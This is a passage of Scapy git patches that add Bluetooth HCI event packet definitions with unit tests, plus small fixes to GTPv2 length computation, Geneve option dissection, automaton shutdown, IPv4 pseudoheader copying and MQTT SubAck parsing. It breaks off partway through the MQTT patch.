Antonio Vazquez Date: Tue, 6 Feb 2024 01:08:17 +0100 Subject: [PATCH 1193/1632] Bluetooth: Add more HCI event packets (#4165) * bluetooth: Add more HCI event packets * Restore HCI_Event_Extended_Inquiry_Result --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/bluetooth.py | 312 ++++++++++++++++++++++++++++---- test/scapy/layers/bluetooth.uts | 125 ++++++++++++- 2 files changed, 399 insertions(+), 38 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 4d2c1bd6d4a..4b164d5853c 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -196,6 +196,73 @@ class HCI_PHDR_Hdr(Packet): 0x11: "insufficient resources", } +_bluetooth_features = [ + '3_slot_packets', + '5_slot_packets', + 'encryption', + 'slot_offset', + 'timing_accuracy', + 'role_switch', + 'hold_mode', + 'sniff_mode', + 'park_mode', + 'power_control_requests', + 'channel_quality_driven_data_rate', + 'sco_link', + 'hv2_packets', + 'hv3_packets', + 'u_law_log_synchronous_data', + 'a_law_log_synchronous_data', + 'cvsd_synchronous_data', + 'paging_parameter_negotiation', + 'power_control', + 'transparent_synchronous_data', + 'flow_control_lag_4_bit0', + 'flow_control_lag_4_bit1', + 'flow_control_lag_4_bit2', + 'broadband_encryption', + 'cvsd_synchronous_data', + 'edr_acl_2_mbps_mode', + 'edr_acl_3_mbps_mode', + 'enhanced_inquiry_scan', + 'interlaced_inquiry_scan', + 'interlaced_page_scan', + 'rssi_with_inquiry_results', + 'ev3_packets', + 'ev4_packets', + 'ev5_packets', + 'reserved', + 'afh_capable_slave', + 'afh_classification_slave', + 'br_edr_not_supported', + 'le_supported_controller', + '3_slot_edr_acl_packets', + '5_slot_edr_acl_packets', + 'sniff_subrating', + 'pause_encryption', + 'afh_capable_master', + 'afh_classification_master', + 'edr_esco_2_mbps_mode', + 'edr_esco_3_mbps_mode', + '3_slot_edr_esco_packets', + 'extended_inquiry_response', + 'simultaneous_le_and_br_edr_to_same_device_capable_controller', + 'reserved2', + 'secure_simple_pairing', + 'encapsulated_pdu', + 'erroneous_data_reporting', + 'non_flushable_packet_boundary_flag', + 'reserved3', + 'link_supervision_timeout_changed_event', + 'inquiry_tx_power_level', + 'enhanced_power_control', + 'reserved4_bit0', + 'reserved4_bit1', + 'reserved4_bit2', + 'reserved4_bit3', + 'extended_features', +] + class HCI_Hdr(Packet): name = "HCI header" @@ -918,6 +985,12 @@ class EIR_Hdr(Packet): def mysummary(self): return self.sprintf("EIR %type%") + def guess_payload_class(self, payload): + if self.len == 0: + # For Extended_Inquiry_Response, stop when len=0 + return conf.padding_layer + return super(EIR_Hdr, self).guess_payload_class(payload) + class EIR_Element(Packet): name = "EIR Element" @@ -1100,6 +1173,24 @@ def post_build(self, p, pay): p = p[:2] + struct.pack("B", len(pay)) + p[3:] return p + +# BUETOOTH CORE SPECIFICATION 5.4 | Vol 3, Part C +# 8 EXTENDED INQUIRY RESPONSE + +class HCI_Extended_Inquiry_Response(Packet): + fields_desc = [ + PadField( + PacketListField( + "eir_data", [], + next_cls_cb=lambda *args: ( + (not args[2] or args[2].len != 0) and EIR_Hdr or conf.raw_layer + ) + ), + align=31, padwith=b"\0", + ), + ] + + # BLUETOOTH CORE SPECIFICATION Version 5.4 | Vol 4, Part E # 7 HCI COMMANDS AND EVENTS # 7.1 LINK CONTROL COMMANDS, the OGF is defined as 0x01 @@ -1500,8 +1591,7 @@ class HCI_Cmd_Write_Connect_Accept_Timeout(Packet): class HCI_Cmd_Write_Extended_Inquiry_Response(Packet): name = "HCI_Write_Extended_Inquiry_Response" fields_desc = [ByteField("fec_required", 0), - PacketListField("eir_data", [], EIR_Hdr, - length_from=lambda pkt:pkt.len)] + HCI_Extended_Inquiry_Response] class HCI_Cmd_Read_LE_Host_Support(Packet): @@ -1579,14 +1669,14 @@ class HCI_Cmd_LE_Set_Advertising_Data(Packet): fields_desc = [FieldLenField("len", None, length_of="data", fmt="B"), PadField( PacketListField("data", [], EIR_Hdr, - length_from=lambda pkt:pkt.len), + length_from=lambda pkt: pkt.len), align=31, padwith=b"\0"), ] class HCI_Cmd_LE_Set_Scan_Response_Data(Packet): name = "HCI_LE_Set_Scan_Response_Data" fields_desc = [FieldLenField("len", None, length_of="data", fmt="B"), - StrLenField("data", "", length_from=lambda pkt:pkt.len), ] + StrLenField("data", "", length_from=lambda pkt: pkt.len), ] class HCI_Cmd_LE_Set_Advertise_Enable(Packet): @@ -1704,50 +1794,108 @@ class HCI_Event_Inquiry_Complete(Packet): """ 7.7.1 Inquiry Complete event """ - name = "HCI_Inquiry_Complete" - fields_desc = [ByteField("status", 0), ] + fields_desc = [ + ByteEnumField('status', 0, _bluetooth_error_codes) + ] + + +class HCI_Event_Inquiry_Result(Packet): + """ + 7.7.2 Inquiry Result event + """ + name = "HCI_Inquiry_Result" + fields_desc = [ + ByteField("num_response", 0x00), + FieldListField("addr", None, LEMACField, + count_from=lambda p: p.num_response), + FieldListField("page_scan_repetition_mode", None, ByteField, + count_from=lambda p: p.num_response), + FieldListField("reserved", None, LEShortField, + count_from=lambda p: p.num_response), + FieldListField("device_class", None, XLE3BytesField, + count_from=lambda p: p.num_response), + FieldListField("clock_offset", None, LEShortField, + count_from=lambda p: p.num_response) + ] class HCI_Event_Connection_Complete(Packet): """ 7.7.3 Connection Complete event """ - name = "HCI_Connection_Complete" - fields_desc = [ByteField("status", 0), + fields_desc = [ByteEnumField('status', 0, _bluetooth_error_codes), LEShortField("handle", 0x0100), LEMACField("bd_addr", None), ByteEnumField("link_type", 0, {0: "SCO connection", 1: "ACL connection", }), - ByteEnumField("encryption_enaled", 0, + ByteEnumField("encryption_enabled", 0, {0: "link level encryption disabled", 1: "link level encryption enabled", }), ] class HCI_Event_Disconnection_Complete(Packet): - name = "Disconnection Complete" - fields_desc = [ByteEnumField("status", 0, {0: "success"}), + """ + 7.7.5 Disconnection Complete event + """ + name = "HCI_Disconnection_Complete" + fields_desc = [ByteEnumField("status", 0, _bluetooth_error_codes), LEShortField("handle", 0), XByteField("reason", 0), ] class HCI_Event_Remote_Name_Request_Complete(Packet): - name = "Remote Name Request Complete" - fields_desc = [ByteField("status", 0), + """ + 7.7.7 Remote Name Request Complete event + """ + name = "HCI_Remote_Name_Request_Complete" + fields_desc = [ByteEnumField("status", 0, _bluetooth_error_codes), LEMACField("bd_addr", None), StrFixedLenField("remote_name", b"\x00", 248), ] class HCI_Event_Encryption_Change(Packet): - name = "Encryption Change" + """ + 7.7.8 Encryption Change event + """ + name = "HCI_Encryption_Change" fields_desc = [ByteEnumField("status", 0, {0: "change has occurred"}), LEShortField("handle", 0), ByteEnumField("enabled", 0, {0: "OFF", 1: "ON (LE)", 2: "ON (BR/EDR)"}), ] # noqa: E501 +class HCI_Event_Read_Remote_Supported_Features_Complete(Packet): + """ + 7.7.11 Read Remote Supported Features Complete event + """ + name = "HCI_Read_Remote_Supported_Features_Complete" + fields_desc = [ + ByteEnumField('status', 0, _bluetooth_error_codes), + LEShortField('handle', 0), + FlagsField('lmp_features', 0, -64, _bluetooth_features) + ] + + +class HCI_Event_Read_Remote_Version_Information_Complete(Packet): + """ + 7.7.12 Read Remote Version Information Complete event + """ + name = "HCI_Read_Remote_Version_Information" + fields_desc = [ + ByteEnumField('status', 0, _bluetooth_error_codes), + LEShortField('handle', 0), + ByteField('version', 0x00), + LEShortField('manufacturer_name', 0x0000), + LEShortField('subversion', 0x0000) + ] + + class HCI_Event_Command_Complete(Packet): - name = "Command Complete" + """ + 7.7.14 Command Complete event + """ + name = "HCI_Command_Complete" fields_desc = [ByteField("number", 0), XLEShortField("opcode", 0), ByteEnumField("status", 0, _bluetooth_error_codes)] @@ -1759,19 +1907,11 @@ def answers(self, other): return other[HCI_Command_Hdr].opcode == self.opcode -class HCI_Cmd_Complete_Read_BD_Addr(Packet): - name = "Read BD Addr" - fields_desc = [LEMACField("addr", None), ] - - -class HCI_Cmd_Complete_LE_Read_White_List_Size(Packet): - name = "LE Read White List Size" - fields_desc = [ByteField("status", 0), - ByteField("size", 0), ] - - class HCI_Event_Command_Status(Packet): - name = "Command Status" + """ + 7.7.15 Command Status event + """ + name = "HCI_Command_Status" fields_desc = [ByteEnumField("status", 0, {0: "pending"}), ByteField("number", 0), XLEShortField("opcode", None), ] @@ -1784,12 +1924,100 @@ def answers(self, other): class HCI_Event_Number_Of_Completed_Packets(Packet): - name = "Number Of Completed Packets" - fields_desc = [ByteField("number", 0)] + """ + 7.7.19 Number Of Completed Packets event + """ + name = "HCI_Number_Of_Completed_Packets" + fields_desc = [ByteField("num_handles", 0), + FieldListField("connection_handle_list", None, + LEShortField("connection_handle", 0), + count_from=lambda p: p.num_handles), + FieldListField("num_completed_packets_list", None, + LEShortField("num_completed_packets", 0), + count_from=lambda p: p.num_handles)] + + +class HCI_Event_Link_Key_Request(Packet): + """ + 7.7.23 Link Key Request event + """ + name = 'HCI_Link_Key_Request' + fields_desc = [ + LEMACField('bd_addr', None) + ] + + +class HCI_Event_Inquiry_Result_With_Rssi(Packet): + """ + 7.7.33 Inquiry Result with RSSI event + """ + name = "HCI_Inquiry_Result_with_RSSI" + fields_desc = [ + ByteField("num_response", 0x00), + FieldListField("bd_addr", None, LEMACField, + count_from=lambda p: p.num_response), + FieldListField("page_scan_repetition_mode", None, ByteField, + count_from=lambda p: p.num_response), + FieldListField("reserved", None, LEShortField, + count_from=lambda p: p.num_response), + FieldListField("device_class", None, XLE3BytesField, + count_from=lambda p: p.num_response), + FieldListField("clock_offset", None, LEShortField, + count_from=lambda p: p.num_response), + FieldListField("rssi", None, SignedByteField, + count_from=lambda p: p.num_response) + ] + + +class HCI_Event_Read_Remote_Extended_Features_Complete(Packet): + """ + 7.7.34 Read Remote Extended Features Complete event + """ + name = "HCI_Read_Remote_Extended_Features_Complete" + fields_desc = [ + ByteEnumField('status', 0, _bluetooth_error_codes), + LEShortField('handle', 0), + ByteField('page', 0x00), + ByteField('max_page', 0x00), + XLELongField('extended_features', 0) + ] + + +class HCI_Event_Extended_Inquiry_Result(Packet): + """ + 7.7.38 Extended Inquiry Result event + """ + name = "HCI_Extended_Inquiry_Result" + fields_desc = [ + ByteField('num_response', 0x01), + LEMACField('bd_addr', None), + ByteField('page_scan_repetition_mode', 0x00), + ByteField('reserved', 0x00), + XLE3BytesField('device_class', 0x000000), + LEShortField('clock_offset', 0x0000), + SignedByteField('rssi', 0x00), + HCI_Extended_Inquiry_Response, + ] + + +class HCI_Event_IO_Capability_Response(Packet): + """ + 7.7.41 IO Capability Response event + """ + name = "HCI_IO_Capability_Response" + fields_desc = [ + LEMACField('bd_addr', None), + ByteField('io_capability', 0x00), + ByteField('oob_data_present', 0x00), + ByteField('authentication_requirements', 0x00) + ] class HCI_Event_LE_Meta(Packet): - name = "LE Meta" + """ + 7.7.65 LE Meta event + """ + name = "HCI_LE_Meta" fields_desc = [ByteEnumField("event", 0, { 1: "connection_complete", 2: "advertising_report", @@ -1805,6 +2033,17 @@ def answers(self, other): return self.payload.answers(other) +class HCI_Cmd_Complete_Read_BD_Addr(Packet): + name = "Read BD Addr" + fields_desc = [LEMACField("addr", None), ] + + +class HCI_Cmd_Complete_LE_Read_White_List_Size(Packet): + name = "LE Read White List Size" + fields_desc = [ByteField("status", 0), + ByteField("size", 0), ] + + class HCI_LE_Meta_Connection_Complete(Packet): name = "Connection Complete" fields_desc = [ByteEnumField("status", 0, {0: "success"}), @@ -1841,7 +2080,7 @@ class HCI_LE_Meta_Advertising_Report(Packet): LEMACField("addr", None), FieldLenField("len", None, length_of="data", fmt="B"), PacketListField("data", [], EIR_Hdr, - length_from=lambda pkt:pkt.len), + length_from=lambda pkt: pkt.len), SignedByteField("rssi", 0)] def extract_padding(self, s): @@ -1853,7 +2092,7 @@ class HCI_LE_Meta_Advertising_Reports(Packet): fields_desc = [FieldLenField("len", None, count_of="reports", fmt="B"), PacketListField("reports", None, HCI_LE_Meta_Advertising_Report, - count_from=lambda pkt:pkt.len)] + count_from=lambda pkt: pkt.len)] class HCI_LE_Meta_Long_Term_Key_Request(Packet): @@ -1963,14 +2202,21 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): # 7.7 EVENTS bind_layers(HCI_Event_Hdr, HCI_Event_Inquiry_Complete, code=0x01) - +bind_layers(HCI_Event_Hdr, HCI_Event_Inquiry_Result, code=0x02) bind_layers(HCI_Event_Hdr, HCI_Event_Connection_Complete, code=0x03) bind_layers(HCI_Event_Hdr, HCI_Event_Disconnection_Complete, code=0x05) bind_layers(HCI_Event_Hdr, HCI_Event_Remote_Name_Request_Complete, code=0x07) bind_layers(HCI_Event_Hdr, HCI_Event_Encryption_Change, code=0x08) +bind_layers(HCI_Event_Hdr, HCI_Event_Read_Remote_Supported_Features_Complete, code=0x0b) +bind_layers(HCI_Event_Hdr, HCI_Event_Read_Remote_Version_Information_Complete, code=0x0c) # noqa: E501 bind_layers(HCI_Event_Hdr, HCI_Event_Command_Complete, code=0x0e) bind_layers(HCI_Event_Hdr, HCI_Event_Command_Status, code=0x0f) bind_layers(HCI_Event_Hdr, HCI_Event_Number_Of_Completed_Packets, code=0x13) +bind_layers(HCI_Event_Hdr, HCI_Event_Link_Key_Request, code=0x17) +bind_layers(HCI_Event_Hdr, HCI_Event_Inquiry_Result_With_Rssi, code=0x22) +bind_layers(HCI_Event_Hdr, HCI_Event_Read_Remote_Extended_Features_Complete, code=0x23) +bind_layers(HCI_Event_Hdr, HCI_Event_Extended_Inquiry_Result, code=0x2f) +bind_layers(HCI_Event_Hdr, HCI_Event_IO_Capability_Response, code=0x32) bind_layers(HCI_Event_Hdr, HCI_Event_LE_Meta, code=0x3e) bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_Read_BD_Addr, opcode=0x1009) # noqa: E501 diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 048c5f8b172..fe481199f64 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -265,17 +265,34 @@ assert expected_cmd_raw_data == cmd_raw_data + HCI Events -= Connect Complete += Inquiry Complete +evt_raw_data = hex_bytes("04010100") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Inquiry_Complete in evt_pkt +assert evt_pkt[HCI_Event_Inquiry_Complete].status == 0 + += Inquiry Result +# TODO -evt_raw_data = hex_bytes("04030b00000176d56f9501000100") += Connection Complete +evt_raw_data = hex_bytes("04030b000b00093491e5b7540100") evt_pkt = HCI_Hdr(evt_raw_data) assert HCI_Event_Connection_Complete in evt_pkt assert evt_pkt[HCI_Event_Connection_Complete].status == 0 -assert evt_pkt[HCI_Event_Connection_Complete].handle == 256 -assert evt_pkt[HCI_Event_Connection_Complete].bd_addr == "00:01:95:6f:d5:76" +assert evt_pkt[HCI_Event_Connection_Complete].handle == 0x000b +assert evt_pkt[HCI_Event_Connection_Complete].bd_addr == "54:b7:e5:91:34:09" +assert evt_pkt[HCI_Event_Connection_Complete].link_type == 1 +assert evt_pkt[HCI_Event_Connection_Complete].encryption_enabled == 0 -= Remote Name Request Complete += Disconnection Complete +evt_raw_data = hex_bytes("04050400400016") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Disconnection_Complete in evt_pkt +assert evt_pkt[HCI_Event_Disconnection_Complete].status == 0 +assert evt_pkt[HCI_Event_Disconnection_Complete].handle == 0x0040 +assert evt_pkt[HCI_Event_Disconnection_Complete].reason == 0x16 += Remote Name Request Complete evt_raw_data = hex_bytes("0407ff0076d56f950100746573742d6c6170746f70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") evt_pkt = HCI_Hdr(evt_raw_data) assert HCI_Event_Remote_Name_Request_Complete in evt_pkt @@ -283,6 +300,104 @@ assert evt_pkt[HCI_Event_Remote_Name_Request_Complete].status == 0 assert evt_pkt[HCI_Event_Remote_Name_Request_Complete].bd_addr == "00:01:95:6f:d5:76" assert evt_pkt[HCI_Event_Remote_Name_Request_Complete].remote_name == b"test-laptop".ljust(248, b"\x00") += Encryption Change +evt_raw_data = hex_bytes("040804000b0001") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Encryption_Change in evt_pkt +assert evt_pkt[HCI_Event_Encryption_Change].status == 0 +assert evt_pkt[HCI_Event_Encryption_Change].handle == 0x000b +assert evt_pkt[HCI_Event_Encryption_Change].enabled == 1 + += Read Remote Supported Features Complete +evt_raw_data = hex_bytes("040b0b000b00fffe8ffedbff5b87") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Read_Remote_Supported_Features_Complete in evt_pkt +assert evt_pkt[HCI_Event_Read_Remote_Supported_Features_Complete].status == 0 +assert evt_pkt[HCI_Event_Read_Remote_Supported_Features_Complete].handle == 0x000b +assert evt_pkt[HCI_Event_Read_Remote_Supported_Features_Complete].lmp_features == 0x875bffdbfe8ffeff + += Read Remote Version Information Complete +evt_raw_data = hex_bytes("040c080002000bb0022c04") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Read_Remote_Version_Information_Complete in evt_pkt +assert evt_pkt[HCI_Event_Read_Remote_Version_Information_Complete].status == 0 +assert evt_pkt[HCI_Event_Read_Remote_Version_Information_Complete].handle == 0x0002 +assert evt_pkt[HCI_Event_Read_Remote_Version_Information_Complete].version == 0x0b +assert evt_pkt[HCI_Event_Read_Remote_Version_Information_Complete].manufacturer_name == 0x02b0 +assert evt_pkt[HCI_Event_Read_Remote_Version_Information_Complete].subversion == 1068 + += Command Complete +evt_raw_data = hex_bytes("040e0a010b04002587ceedd668") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Command_Complete in evt_pkt +assert evt_pkt[HCI_Event_Command_Complete].number == 1 +assert evt_pkt[HCI_Event_Command_Complete].opcode == 0x040b +assert evt_pkt[HCI_Event_Command_Complete].status == 0 + += Command Status +evt_raw_data = hex_bytes("040f0400011904") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Command_Status in evt_pkt +assert evt_pkt[HCI_Event_Command_Status].status == 0 +assert evt_pkt[HCI_Event_Command_Status].number == 1 +assert evt_pkt[HCI_Event_Command_Status].opcode == 0x0419 + += Number Of Completed Packets +evt_raw_data = hex_bytes("0413050103000300") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Number_Of_Completed_Packets in evt_pkt +assert evt_pkt[HCI_Event_Number_Of_Completed_Packets].num_handles == 1 +assert evt_pkt[HCI_Event_Number_Of_Completed_Packets].connection_handle_list[0] == 0x0003 +assert evt_pkt[HCI_Event_Number_Of_Completed_Packets].num_completed_packets_list[0] == 3 + += Link Key Request +evt_raw_data = hex_bytes("041706093491e5b754") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Link_Key_Request in evt_pkt +assert evt_pkt[HCI_Event_Link_Key_Request].bd_addr == '54:b7:e5:91:34:09' + += Inquiry Result with RSSI +# TODO + += Read Remote Extended Features Complete +evt_raw_data = hex_bytes("04230d000b0001020300000000000000") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Read_Remote_Extended_Features_Complete in evt_pkt +assert evt_pkt[HCI_Event_Read_Remote_Extended_Features_Complete].status == 0 +assert evt_pkt[HCI_Event_Read_Remote_Extended_Features_Complete].handle == 0x000b +assert evt_pkt[HCI_Event_Read_Remote_Extended_Features_Complete].page == 1 +assert evt_pkt[HCI_Event_Read_Remote_Extended_Features_Complete].max_page == 2 +assert evt_pkt[HCI_Event_Read_Remote_Extended_Features_Complete].extended_features == 0x0000000000000003 + += Extended Inquiry Result +evt_raw_data = hex_bytes("042fff01093491e5b75401001404247c37c2091001000a00ffffffff020a040b020d110b110a110e110f110c095354414e4d4f524520494900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Extended_Inquiry_Result in evt_pkt +assert evt_pkt[HCI_Event_Extended_Inquiry_Result].num_response == 1 +assert evt_pkt[HCI_Event_Extended_Inquiry_Result].bd_addr == '54:b7:e5:91:34:09' +assert evt_pkt[HCI_Event_Extended_Inquiry_Result].page_scan_repetition_mode == 1 +assert evt_pkt[HCI_Event_Extended_Inquiry_Result].device_class == 0x240414 +assert evt_pkt[HCI_Event_Extended_Inquiry_Result].clock_offset == 0x377c +assert evt_pkt[HCI_Event_Extended_Inquiry_Result].rssi == -62 +assert EIR_Hdr in evt_pkt[HCI_Event_Extended_Inquiry_Result].eir_data[0] +assert Raw in evt_pkt[HCI_Event_Extended_Inquiry_Result].eir_data[-1] +assert len(evt_pkt[HCI_Event_Extended_Inquiry_Result].eir_data[-1].load) == 200 + += IO Capability Response +evt_raw_data = hex_bytes("043209093491e5b754030002") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_IO_Capability_Response in evt_pkt +assert evt_pkt[HCI_Event_IO_Capability_Response].bd_addr == '54:b7:e5:91:34:09' +assert evt_pkt[HCI_Event_IO_Capability_Response].io_capability == 0x03 +assert evt_pkt[HCI_Event_IO_Capability_Response].oob_data_present == 0 +assert evt_pkt[HCI_Event_IO_Capability_Response].authentication_requirements == 0x02 + += LE Meta +evt_raw_data = hex_bytes("043e0414400000") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_LE_Meta in evt_pkt +assert evt_pkt[HCI_Event_LE_Meta].event == 0x14 + = LE Connection Update Event evt_raw_data = hex_bytes("043e0a03004800140001003c00") evt_pkt = HCI_Hdr(evt_raw_data) From 18d4c30fa4ecda7d909313ac613b8c3012ceb4bc Mon Sep 17 00:00:00 2001 From: vk-coder Date: Tue, 6 Feb 2024 05:40:53 +0530 Subject: [PATCH 1194/1632] Fix GTP payload length computation (#3822) Reducing length of 'length' field along with 'ietype' and 'CR_flag+instance' --- scapy/contrib/gtp.py | 2 +- test/contrib/gtp_v2.uts | 7 +++++-- 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 2dcce849354..1c12e8cf37b 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -451,7 +451,7 @@ def post_build(self, p, pay): tmp_len = len(p) if isinstance(self.payload, conf.padding_layer): tmp_len += len(self.payload.load) - p = p[:1] + struct.pack("!H", tmp_len - 2) + p[3:] + p = p[:1] + struct.pack("!H", tmp_len - 4) + p[3:] return p + pay diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 79079276862..2bd7716f466 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -16,8 +16,11 @@ gtp.dport == 2123 and gtp.seq == 12345 and gtp.gtp_type == 1 and gtp.T == 0 = GTPV2CreateSessionRequest, basic instantiation gtp = IP() / UDP(dport=2123) / \ GTPHeader(gtp_type="create_session_req", teid=2807, seq=12345) / \ - GTPV2CreateSessionRequest() -gtp.dport == 2123 and gtp.teid == 2807 and gtp.seq == 12345 + GTPV2CreateSessionRequest(IE_list=[IE_IMSI(IMSI=b'001030000000356'),IE_APN(APN=b'super')]) + +assert gtp.dport == 2123 and gtp.teid == 2807 and gtp.seq == 12345 +ie = gtp.IE_list[1] +assert ie.APN == b"super" = GTPV2EchoRequest, dissection h = "333333333333222222222222810080c808004588002937dd0000fd1115490a2a00010a2a0002084b084b00152d0e4001000900000100030001000daa000000003f1f382f" From 703cd5a7f5a4db264027fc1100d724c41dad0473 Mon Sep 17 00:00:00 2001 From: Pavel Date: Tue, 6 Feb 2024 02:13:06 +0200 Subject: [PATCH 1195/1632] Fix Geneve dissection (#3917) * fix Geneve dissection * Removed accidentally added local files and added unit test. * Little enhancement of Geneve multiple options test * Removed redundant line from gitignore --- .gitignore | 1 + scapy/contrib/geneve.py | 3 +++ test/contrib/geneve.uts | 10 ++++++++++ 3 files changed, 14 insertions(+) diff --git a/.gitignore b/.gitignore index 87aaa035354..fc08904957f 100644 --- a/.gitignore +++ b/.gitignore @@ -11,6 +11,7 @@ coverage.xml .ipynb_checkpoints .mypy_cache .vscode +.DS_Store [.]venv/ __pycache__/ doc/scapy/_build diff --git a/scapy/contrib/geneve.py b/scapy/contrib/geneve.py index b44cb543331..6515f299abb 100644 --- a/scapy/contrib/geneve.py +++ b/scapy/contrib/geneve.py @@ -43,6 +43,9 @@ class GeneveOptions(Packet): BitField("length", None, 5), StrLenField('data', '', length_from=lambda x: x.length * 4)] + def extract_padding(self, s): + return "", s + def post_build(self, p, pay): if self.length is None: tmp_len = len(self.data) // 4 diff --git a/test/contrib/geneve.uts b/test/contrib/geneve.uts index 697a359f788..5e730dcaf3a 100644 --- a/test/contrib/geneve.uts +++ b/test/contrib/geneve.uts @@ -30,6 +30,16 @@ assert (s == b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x81\x00\x00\x01\ p = Ether(s) assert GENEVE in p and Ether in p[GENEVE].payload and p[GENEVE].proto == 0x6558 and p[GeneveOptions].length == 1 and p[GeneveOptions].classid == 0x102 and p[GeneveOptions].type == 0x80 += Build & dissect - GENEVE with multiple options + +s = raw(GENEVE(proto=0x0800,options=[GeneveOptions(classid=0x0102,type=0x1,data=b'\x00\x01\x00\x02'), GeneveOptions(classid=0x0102,type=0x2,data=b'\x00\x01\x00\x02')])) +p = GENEVE(s) +assert p.optionlen == 4 +assert len(p.options) == 2 +assert p.options[0].classid == 0x102 and p.options[0].type == 0x1 +assert p.options[1].classid == 0x102 and p.options[1].type == 0x2 + + = Build & dissect - GENEVE encapsulates IPv4 s = raw(IP()/UDP(sport=10000)/GENEVE()/IP()) From d3442b40218f236dcea34f2cf7b48c30162c54ce Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 6 Feb 2024 11:43:36 +0100 Subject: [PATCH 1196/1632] Catch shutting down ImportError (#4267) --- scapy/automaton.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index f9b4d4ef202..ba7bafc71a2 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -226,7 +226,11 @@ def close(self): os.close(self.__rd) os.close(self.__wr) if WINDOWS: - self._winclose() + try: + self._winclose() + except ImportError: + # Python is shutting down + pass def __repr__(self): # type: () -> str From 970aa8a6e8f7b532522d0c46fb48bed5a8057636 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 6 Feb 2024 11:44:57 +0100 Subject: [PATCH 1197/1632] Fix in4_pseudoheader being destructive (#4259) --- scapy/layers/inet.py | 1 + test/scapy/layers/inet.uts | 9 +++++++++ 2 files changed, 10 insertions(+) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 694a496b662..802aa57c103 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -635,6 +635,7 @@ def in4_pseudoheader(proto, u, plen): :param u: IP layer instance :param plen: the length of the upper layer and payload """ + u = u.copy() if u.len is not None: if u.ihl is None: olen = sum(len(x) for x in u.options) diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 18fdce0e262..12f096dc77a 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -817,3 +817,12 @@ assert no_sr[UDP].chksum == sr[UDP].chksum sr = IP(raw(IP(options=[IPOption_LSRR(routers=["1.1.1.1"]), IPOption_SSRR(routers=["8.8.8.8"])])/UDP()/DNS())) assert no_sr[UDP].chksum != sr[UDP].chksum + +# GH4174 +sr = Ether(src="de:ad:be:ef:aa:55", dst="ca:fe:00:00:00:00")/IP(src="20.0.0.1",dst="100.0.0.1")/ \ + IP(src="20.0.0.1",dst="100.0.0.1", options=[IPOption_SSRR(copy_flag=1, pointer=4, routers=["1.1.1.1", "8.8.8.8"])])/ \ + UDP(sport=1111, dport=2222) / VXLAN() / \ + Ether(src="de:ad:be:ef:aa:55", dst="ca:fe:00:00:00:00")/IP(src="20.0.0.1",dst="100.0.0.1") / \ + TCP() +bytes(sr[UDP]) +assert sr[IP:2].dst == "100.0.0.1" From 286523c471ea0aec1470abc9226765652dae92ef Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 6 Feb 2024 15:24:08 +0100 Subject: [PATCH 1198/1632] Fix MQTT SubAck retcodes (#4257) --- scapy/contrib/mqtt.py | 31 ++++++++++++++++++++++++------- test/contrib/mqtt.uts | 13 +++++++++---- 2 files changed, 33 insertions(+), 11 deletions(-) diff --git a/scapy/contrib/mqtt.py b/scapy/contrib/mqtt.py index d27205d9684..afd75e78a02 100644 --- a/scapy/contrib/mqtt.py +++ b/scapy/contrib/mqtt.py @@ -7,8 +7,17 @@ # scapy.contrib.status = loads from scapy.packet import Packet, bind_layers -from scapy.fields import FieldLenField, BitEnumField, StrLenField, \ - ShortField, ConditionalField, ByteEnumField, ByteField, PacketListField +from scapy.fields import ( + BitEnumField, + ByteEnumField, + ByteField, + ConditionalField, + FieldLenField, + FieldListField, + PacketListField, + ShortField, + StrLenField, +) from scapy.layers.inet import TCP from scapy.error import Scapy_Exception from scapy.compat import orb, chb @@ -250,10 +259,18 @@ class 